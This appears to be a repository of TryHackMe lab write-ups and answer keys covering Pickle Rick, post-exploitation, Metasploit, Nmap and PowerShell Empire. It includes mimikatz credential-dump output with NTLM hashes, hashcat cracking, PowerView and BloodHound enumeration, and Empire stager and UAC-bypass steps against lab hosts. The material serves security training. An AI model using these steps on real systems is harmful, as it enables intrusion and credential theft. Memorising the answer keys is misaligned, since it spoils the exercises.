: `fleeb juice` 12 | -------------------------------------------------------------------------------- /Pickle Rick/gobuster.txt: -------------------------------------------------------------------------------- 1 | ╭─root@kali ~/TryHackMe/Rooms/Pickle_Rick ‹master*› 2 | ╰─# gobuster dir -u 10.10.183.2 -w /usr/share/dirb/wordlists/common.txt 3 | =============================================================== 4 | Gobuster v3.0.1 5 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 6 | =============================================================== 7 | [+] Url: http://10.10.183.2 8 | [+] Threads: 10 9 | [+] Wordlist: /usr/share/dirb/wordlists/common.txt 10 | [+] Status codes: 200,204,301,302,307,401,403 11 | [+] User Agent: gobuster/3.0.1 12 | [+] Timeout: 10s 13 | =============================================================== 14 | 2020/05/25 17:22:02 Starting gobuster 15 | =============================================================== 16 | /.hta (Status: 403) 17 | /.htpasswd (Status: 403) 18 | /.htaccess (Status: 403) 19 | /assets (Status: 301) 20 | /index.html (Status: 200) 21 | /robots.txt (Status: 200) 22 | /server-status (Status: 403) 23 | =============================================================== 24 | 2020/05/25 17:23:46 Finished 25 | =============================================================== 26 | 27 | -------------------------------------------------------------------------------- /Pickle Rick/login.txt: -------------------------------------------------------------------------------- 1 | http://10.10.183.2/login.php 2 | 3 | http://10.10.183.2/portal.php 4 | -------------------------------------------------------------------------------- /Pickle Rick/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Mon May 25 17:19:46 2020 as: nmap -sCSV -A -O -oN nmap_basic.nmap -Pn 10.10.183.2 2 | Nmap scan report for 10.10.183.2 3 | Host is up (0.19s latency). 
4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 2a:05:08:61:53:b5:9e:c6:5f:6c:a1:79:a1:43:51:fb (RSA) 9 | | 256 87:48:b9:16:c9:2b:7f:27:19:33:cd:f4:55:6b:bb:54 (ECDSA) 10 | |_ 256 4b:95:e8:85:15:f5:60:f9:fa:3e:fe:3b:81:f6:81:93 (ED25519) 11 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 12 | |_http-server-header: Apache/2.4.18 (Ubuntu) 13 | |_http-title: Rick is sup4r cool 14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 15 | TCP/IP fingerprint: 16 | OS:SCAN(V=7.80%E=4%D=5/25%OT=22%CT=1%CU=37502%PV=Y%DS=2%DC=T%G=Y%TM=5ECBB12 17 | OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=8)SEQ 18 | OS:(SP=103%GCD=1%ISR=103%TI=Z%CI=I%TS=8)SEQ(SP=103%GCD=1%ISR=103%TI=Z%II=I% 19 | OS:TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5 20 | OS:=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6= 21 | OS:68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% 22 | OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 23 | OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S 24 | OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R 25 | OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N 26 | OS:%T=40%CD=S) 27 | 28 | Network Distance: 2 hops 29 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 30 | 31 | TRACEROUTE (using port 30951/tcp) 32 | HOP RTT ADDRESS 33 | 1 193.81 ms 10.9.0.1 34 | 2 199.25 ms 10.10.183.2 35 | 36 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
# Nmap done at Mon May 25 17:21:05 2020 -- 1 IP address (1 host up) scanned in 79.26 seconds

--------------------------------------------------------------------------------
/Pickle Rick/robot.txt:
--------------------------------------------------------------------------------
Wubbalubbadubdub

--------------------------------------------------------------------------------
/Pickle Rick/username.txt:
--------------------------------------------------------------------------------
Note to self, remember username!

Username: R1ckRul3s

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/README.md:
--------------------------------------------------------------------------------
# Post-Exploitation Basics | https://tryhackme.com/room/postexploit

`ssh Administrator@10.10.159.61` : `P@$$W0rd`

### [Task 2] Enumeration w/ [Powerview](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/powerview/powerview.txt)

#1 What is the shared folder that is not set by default? : `Share`

#2 What operating system is running inside of the network besides Windows Server 2019? : `Windows 10 Enterprise Evaluation`

#3 I've hidden a flag inside of the users, find it : `POST{P0W3RV13W_FTW}`

### [Task 3] Enumeration w/ [Bloodhound](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/bloodhound/bloodhound.txt)

#1 What service is also a domain admin? : `SQLSERVICE`

#2 What two users are Kerberoastable? : `SQLSERVICE, KRBTGT`

### [Task 4] Dumping hashes w/ [mimikatz](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/mimikatz/mimikatz.txt)

#1 What is the Machine1 Password?
: [`Password1`](https://github.com/thehackingsage/TryHackMe/blob/master/Post-Exploitation-Basics/mimikatz/hashcat.txt)

#2 What is the Machine2 Hash? : `c39f2beb3d2ec06a62cb887fb391dee0`

### [Task 6] Enumeration w/ Server Manager

#1 What tool allows us to view the event logs? : `Event Viewer`

#2 What is the SQL Service password? : `MYpassword123#`

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/bloodhound.txt:
--------------------------------------------------------------------------------
PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
-----------------------------------------------
Initializing SharpHound at 1:19 AM on 8/13/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
PS C:\Users\Administrator> [+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 94 MB RAM
Status: 66 objects finished (+66 33)/s -- Using 99 MB RAM
Enumeration finished in 00:00:02.5366752
Compressing data to C:\Users\Administrator\20200813011952_loot.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 1:19 AM on 8/13/2020! Happy Graphing!
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/kerberoastable-users.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/kerberoastable-users.png

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/loot.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/loot.zip

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/bloodhound/service.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/bloodhound/service.png

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/mimikatz/hashcat.txt:
--------------------------------------------------------------------------------
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

64f12cddaa88057e06a81b54e73b949b = Password1

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/mimikatz/mimikatz.txt:
--------------------------------------------------------------------------------
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.
            "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : bb068638512ac1118ce7f78e92f49792

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 271a221ceb6f5879ee15143b56c96625

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a

mimikatz #

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/powerview/flag.txt:
--------------------------------------------------------------------------------
POST{P0W3RV13W_FTW}
--------------------------------------------------------------------------------
/Post-Exploitation-Basics/powerview/powerview.txt:
--------------------------------------------------------------------------------
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass

Windows PowerShell

Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> . .\Downloads\PowerView.ps1

PS C:\Users\Administrator> Get-NetUser | select cn

cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{P0W3RV13W_FTW}
sshd


PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*

Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins


PS C:\Users\Administrator> get-netshare

shi1_netname shi1_type  shi1_remark
------------ ---------  -----------
ADMIN$       2147483648 Remote Admin
C$           2147483648 Default share
IPC$         2147483651 Remote IPC
NETLOGON              0 Logon server share
Share                 0
SYSVOL                0 Logon server share

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/dashbord.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/dashbord.png

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/event-logs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/event-logs.png

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/login.png

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/rdesktop.txt:
--------------------------------------------------------------------------------
rdesktop -u SG 10.10.92.133

--------------------------------------------------------------------------------
/Post-Exploitation-Basics/server-manager/sql-service-password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Post-Exploitation-Basics/server-manager/sql-service-password.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Try Hack Me | https://tryhackme.com/p/mr.sage

--------------------------------------------------------------------------------
/RP Metasploit/README.md:
--------------------------------------------------------------------------------
# RP : Metasploit | https://tryhackme.com/room/rpmetasploit

### [Task 2] Initializing...

#3 We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the '-' : `-q`

#6 Cool!
We've connected to the database, which type of database does Metasploit 5 use? : `postgresql`

### [Task 3] Rock 'em to the Core [Commands]

#2 The help menu has a very short one-character alias, what is it? : `?`

#3 Finding the various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching? : `search`

#4 Once we've found the module we want to leverage, what command do we use to select it as the active module? : `use`

#5 How about if we want to view information about either a specific module or just the active one we have selected? : `info`

#6 Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can 'talk' to it. What command is this? : `connect`

#7 Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without the -q flag)? : `banner`

#8 We'll revisit these next two commands shortly, however, they're two of the most used commands within Metasploit. First, what command do we use to change the value of a variable? : `set`

#9 Metasploit supports the use of global variables, something which is incredibly useful when you're specifically focusing on a single box. What command changes the value of a variable globally? : `setg`

#10 Now that we've learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I'm looking for a specific three-letter command which is used to view the value of single variables. : `get`

#11 How about changing the value of a variable to null/no value? : `unset`

#12 When performing a penetration test it's quite common to record your screen either for further review or for providing evidence of any actions taken.
This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file? : `spool`

#13 Leaving a Metasploit console running isn't always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file. : `save`

### [Task 4] Modules for Every Occasion!

#1 Easily the most common module utilized, which module holds all of the exploit code we will use? : `exploit`

#2 Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation? : `payload`

#3 Which module is most commonly used in scanning and verifying that machines are exploitable? This is not the same as the actual exploitation of course. : `auxiliary`

#4 One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities? : `post`

#5 Commonly utilized in payload obfuscation, which module allows us to modify the 'appearance' of our exploit such that we may avoid signature detection? : `encoder`

#6 Last but not least, which module is used with buffer overflow and ROP attacks? : `nop`

#7 Not every module is loaded in by default, what command can we use to load different modules? : `load`

### [Task 5] Move that shell!

#2 What service does nmap identify running on port 135? : `msrpc`

#6 Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload.
In Metasploit 5 (the most recent version at the time of writing) you can simply type 'use' followed by a unique string found within only the target exploit. For example, try this out now with the following command 'use icecast'. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start : `exploit/windows/http/icecast_header`

#7 While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command 'search multi/handler'. What is the name of the column on the far left side of the console that shows up next to 'Name'? Go ahead and run the command use NUMBER_NEXT_TO exploit/multi/handler wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use. : `#`

### [Task 6] We're in, now what?

#1 First things first, our initial shell/process typically isn't very stable. Let's go ahead and attempt to move to a different process. First, let's list the processes using the command 'ps'. What's the name of the spool service? : `spoolsv.exe`

#2 Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try! : `migrate`

#3 Well that migration didn't work, let's find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in? : `getuid`

#4 How about finding more information out about the system itself?
: `sysinfo`

#5 This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it? : `load kiwi`

#6 Let's go ahead and figure out the privileges of our current user, what command do we run? : `getprivs`

#7 What command do we run to transfer files to our victim computer? : `upload`

#8 How about if we want to run a Metasploit module? : `run`

#9 A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim? : `ipconfig`

#13 One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell? : `shell`

### [Task 7] Makin' Cisco Proud

#1 Let's go ahead and run the command `run autoroute -h`, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer. : `run autoroute -s 172.18.1.0 -n 255.255.255.0`

#2 Additionally, we can start a socks4a proxy server out of this session. Background our current meterpreter session and run the command `search server/socks4a`. What is the full path to the socks4a auxiliary module? : `auxiliary/server/socks4a`

#3 Once we've started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks4a server with proxychains? : `proxychains`

--------------------------------------------------------------------------------
/RP Nmap/README.md:
--------------------------------------------------------------------------------
# Nmap | https://tryhackme.com/room/rpnmap

### [Task 2] Nmap Quiz

#1 First, how do you access the help menu? : `-h`

#2 Often referred to as a stealth scan, what is the first switch listed for a 'Syn Scan'?
: `-sS`

#3 Not quite as useful but how about a 'UDP Scan'? : `-sU`

#4 What about operating system detection? : `-O`

#5 How about service version detection? : `-sV`

#6 Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag? : `-v`

#7 What about 'very verbose'? (A personal favorite) : `-vv`

#8 Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format? : `-oX`

#9 Aggressive scans can be nice when other scans just aren't getting the output that you want and you really don't care how 'loud' you are, what is the switch for enabling this? : `-A`

#10 How do I set the timing to the max level, sometimes called 'Insane'? : `-T5`

#11 What about if I want to scan a specific port? : `-p`

#12 How about if I want to scan every port? : `-p-`

#13 What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run. : `--script`

#14 What if I want to run all scripts out of the vulnerability category? : `--script vuln`

#15 What switch should I include if I don't want to ping the host? : `-Pn`

### [Task 3] Nmap Scanning

#1 Let's go ahead and start with the basics and perform a syn scan on the box provided. What will this command be without the host IP address? : `nmap -sS`

#2 After scanning this, how many ports do we find open under 1000? : `2`

#3 What communication protocol is given for these ports following the port number? : `tcp`

#4 Perform a service version detection scan, what is the version of the software running on port 22? : `6.6.1p1`

#5 Perform an aggressive scan, what flag isn't set under the results for port 80?
: `httponly`

#6 Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. : `http-slowloris-check`

--------------------------------------------------------------------------------
/RP Nmap/nmap --script vuln 10.10.34.127.txt:
--------------------------------------------------------------------------------
nmap --script vuln 10.10.34.127

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:40 IST
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.34.127
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /login.php: Possible admin folder
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

--------------------------------------------------------------------------------
/RP Nmap/nmap -A 10.10.34.127.txt:
--------------------------------------------------------------------------------
nmap -A 10.10.34.127

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:38 IST
Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 13:38 (0:00:00 remaining)
Nmap scan report for 10.10.34.127
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b8:6c:15:90:70:1f:8d:c6:1d:1c:ff:6f:80:f4:ad:db (DSA)
|   2048 7d:b7:f7:42:15:d1:98:c2:38:55:84:14:58:4f:c8:1a (RSA)
|   256 4d:3d:eb:49:9e:15:e6:d3:9a:41:ea:0d:68:d8:7d:d3 (ECDSA)
|_  256 08:ae:1f:5d:2e:6e:9d:8f:4c:2e:a4:bb:be:fe:9d:82 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop...
|_Requested resource was login.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/21%OT=22%CT=1%CU=44727%PV=Y%DS=2%DC=T%G=Y%TM=5E75CB9
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
OS:1NW6%O6=M54DST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   224.00 ms 10.9.0.1
2   224.06 ms 10.10.34.127

--------------------------------------------------------------------------------
/RP Nmap/nmap -sS 10.10.34.127 .txt:
--------------------------------------------------------------------------------
nmap -sS 10.10.34.127

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:36 IST
Nmap scan report for 10.10.34.127
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

--------------------------------------------------------------------------------
/RP Nmap/nmap -sV -p 22 10.10.34.127.txt:
--------------------------------------------------------------------------------
nmap -sV -p 22 10.10.34.127

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:37 IST
Nmap scan report for 10.10.34.127
Host is up (0.22s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

--------------------------------------------------------------------------------
/RP PS-Empire/PowerShell Empire.txt:
--------------------------------------------------------------------------------
https://github.com/BC-SECURITY/Empire/

--------------------------------------------------------------------------------
/RP PS-Empire/README.md:
--------------------------------------------------------------------------------
# RP: PS Empire | https://tryhackme.com/room/rppsempire

### [Task 3] Listeners

#1 Once Empire has launched, type help to view the various menus. Which menu do we launch to access listeners? : `listeners`

#3 What command can we now type to view all of the options related to our selected listener type? : `info`

#4 Once the information regarding the listener pops up, peruse this for some of the more interesting options we can set in order to disguise our actions more. Which option can we use to set specific times when our listener will be active?
: `WorkingHours`

#5 Similar to changing/spoofing what browser you are using on the internet, what option can we set to appear as a different user agent (i.e. chrome, firefox, etc)? : `DefaultProfile`

#6 What option can we use to set the port which the listener will bind to? : `port`

#7 In addition to changing our browser profile, we can change what our server appears as. What option can we set to change this? : `ServerVersion`

#8 Launch our newly created listener on port 80 with the command 'execute'. What message is displayed following successfully launching the listener? : `Listener successfully started!`

#9 We can verify that our listener is now active by typing what command? : `listeners`

### [Task 4] Stagers

#1 First, type the command 'usestager' and double-tap tab to view all options we have for stagers. Which option allows us to use a batch file? : `windows/launcher_bat`

#2 Let's finish our previous command and select the batch file option. Press enter to finalize this. What is our new path to the 'module' we have selected? : `stager/windows/launcher_bat`

#3 Since we've previously set our listener to use http, we must now set the associated options within our stager we are building to match that. What option must we set in order to accomplish this? : `Listener`

#4 Type execute to finish creating our stager. Where is the stager saved? : `/tmp/launcher.bat`

### [Task 5] Agents and Post-Exploitation

#3 What command do we use to interact with an agent? : `interact`

#4 What about if we wanted to list any usernames and passwords we have gathered? : `creds`

#5 And if we wanted to 'deactivate' an agent for a while to avoid detection? : `sleep`

#6 How about if we wanted to delete an agent or disconnect it? : `kill`

#7 Moving into the post exploitation modules, what command can we use to search through these?
: `searchmodule`

#8 We'll start with the most important module, find the module which plays a specific AC/DC song. : `python/trollsploit/osx/thunderstruck`

#9 What if we wanted to perform an lsa dump with a certain popular windows credential gathering tool? : `powershell/credentials/mimikatz/lsadump`

#10 Sometimes we might not have the permission level that we require to perform further actions, what module set might we have to use to get around UAC? : `bypassuac`

#11 What module family allows us to gather additional information about the network we are on? : `recon`

#12 The process we have compromised might not be the most stable, how do we migrate to another process? (This will have a specific module answer) : `powershell/management/psinject`

#13 Last but not least, what module can we use to turn on remote desktop access for our purposes? : `powershell/management/enable_rdp`

--------------------------------------------------------------------------------
/RP PS-Empire/exploit.txt:
--------------------------------------------------------------------------------
ms17_010_eternalblue

--------------------------------------------------------------------------------
/RP PS-Empire/nmap_vuln.nmap:
--------------------------------------------------------------------------------
# Nmap 7.80 scan initiated Fri May 29 01:17:59 2020 as: nmap --script vuln -oN nmap_vuln.nmap 10.10.64.241
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.64.241
Host is up (0.22s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
49152/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

